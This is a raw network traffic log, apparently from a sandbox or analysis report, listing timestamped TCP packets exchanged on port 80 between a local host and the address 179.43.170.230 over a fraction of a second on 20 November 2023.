Nov 20, 2023 05:21:13.398929119 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.400208950 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.400284052 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.403672934 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.403712034 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.403747082 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.403774023 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.409416914 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.409455061 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.409518957 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.409611940 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.409771919 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.409821987 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.411590099 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.411653996 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.412009001 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.412058115 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.414575100 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.414613008 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.414637089 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.414663076 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.415395021 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.415451050 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.420309067 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.420367956 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.422045946 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.422085047 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.422106028 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.422131062 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.430526972 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.430587053 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.433912992 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.433969021 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.436053038 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.436106920 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.436115980 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.436150074 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.438636065 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.438687086 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.439080954 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.439133883 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.483071089 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.483139038 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.485228062 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.485271931 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.487724066 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.487780094 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.489415884 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.489470959 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.489480972 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.489512920 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.493453026 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.493505955 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.493928909 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.493974924 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.495163918 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.495207071 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.497289896 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.497329950 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.497343063 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.497374058 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.498910904 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.498950005 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.498959064 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.498990059 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.499409914 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.499454975 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.500957966 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.500997066 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.501009941 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.501049042 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.501368999 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.501406908 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.501429081 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.501444101 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.503139019 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.503176928 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.503186941 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.503218889 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.504820108 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.504858017 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.504868984 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.504893064 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.505290031 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.505345106 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.506565094 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.506628036 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.511593103 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.511657000 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.512046099 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.512084007 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.512094021 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.512121916 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.517147064 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.517189026 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.517213106 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.517225981 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.517718077 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.517766953 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.520503998 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.520576954 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.521023035 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.521090984 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.522186041 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.522224903 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.522245884 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.522268057 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.523046017 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.523097038 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.523102999 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.523143053 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.524712086 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.524771929 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.525188923 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.525259972 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.526674032 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.526729107 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.527065039 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.527121067 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.528014898 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.528069973 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.528773069 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.528788090 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.528827906 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.529721975 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.529773951 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.530849934 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.530905962 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.533463001 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.533516884 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.533879995 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.533894062 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.534039974 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.535676003 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.535743952 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.536019087 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.536067963 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.539469957 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.539525032 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.539907932 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.539958000 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.545564890 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.545579910 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.545675993 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.545991898 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.546041012 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.552063942 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.552086115 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.552133083 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.552860022 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.552872896 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.552917004 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.554155111 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.554209948 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.555028915 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.555043936 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.555082083 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.555836916 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.555850983 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.555890083 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.557117939 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.557132006 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.557174921 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.557929039 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.557943106 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.557985067 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.558516026 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.558530092 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.558564901 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.559348106 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.559400082 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.560625076 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.560656071 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.560683966 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.560702085 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.561042070 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.561090946 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.561870098 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.561913967 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.561923027 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.561953068 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.563610077 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.563623905 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.563663960 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.564146996 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.564198017 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.566152096 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.566207886 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.574111938 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.574126005 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.574177980 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.577155113 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.577209949 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.579790115 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.579803944 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.579847097 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.580559015 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.580624104 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.583206892 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.583261967 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.584453106 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.584465981 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.584511995 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.585292101 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.585309982 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.585346937 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.585371017 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.586183071 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.586196899 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.586236000 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.587846994 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.587903023 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.590939045 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.591006041 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.591023922 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.591067076 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.597987890 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.598062992 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.598875999 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.598922014 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.601022005 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.601078987 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.601876974 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.601927042 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.604490995 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.604546070 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.606156111 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.606210947 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.607003927 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.607063055 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.607075930 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.607119083 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.608973980 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.609025955 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.609270096 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.609333038 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.611860991 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.611917019 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.618263960 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.618319988 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.624138117 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.624193907 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.624547958 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.624562025 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.624598026 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.625809908 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.625890970 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.627626896 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.627685070 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.627958059 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.628031969 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.631853104 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.631912947 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.634458065 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.634474993 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.634511948 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.634525061 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.635401011 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.635461092 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.636539936 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.636595011 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.637001038 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.637063980 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.639133930 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.639209032 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.641201019 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.641259909 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.646306038 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.646369934 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.648997068 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.649049044 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.657155991 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.657212019 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.659390926 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.659404993 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.659451008 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.660212040 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.660227060 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.660288095 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.661799908 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.661854029 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.669836044 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.669851065 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.669891119 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.669904947 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.670855999 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.670908928 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.673995018 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.674048901 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.675276995 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.675331116 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.678244114 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.678297997 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.687295914 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.687335968 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.687350035 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.687390089 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.691096067 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.691150904 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.695450068 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.695465088 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.695496082 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.695507050 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.695844889 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.695930004 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.697601080 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.697632074 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.697663069 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.697675943 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.700191021 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.700288057 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.701447010 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.701476097 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.701505899 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.701529980 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.707042933 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.707108974 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.711791992 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.711807966 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.711858034 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.712214947 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.712258101 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.712584019 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.712600946 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.712632895 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.712650061 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.713879108 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.713922024 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.717750072 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.717765093 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.717832088 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.718100071 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.718148947 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.720700026 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.720715046 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.720765114 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.721489906 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.721543074 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.721890926 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.721940041 CET	49731	80	192.168.2.4	179.43.170.230
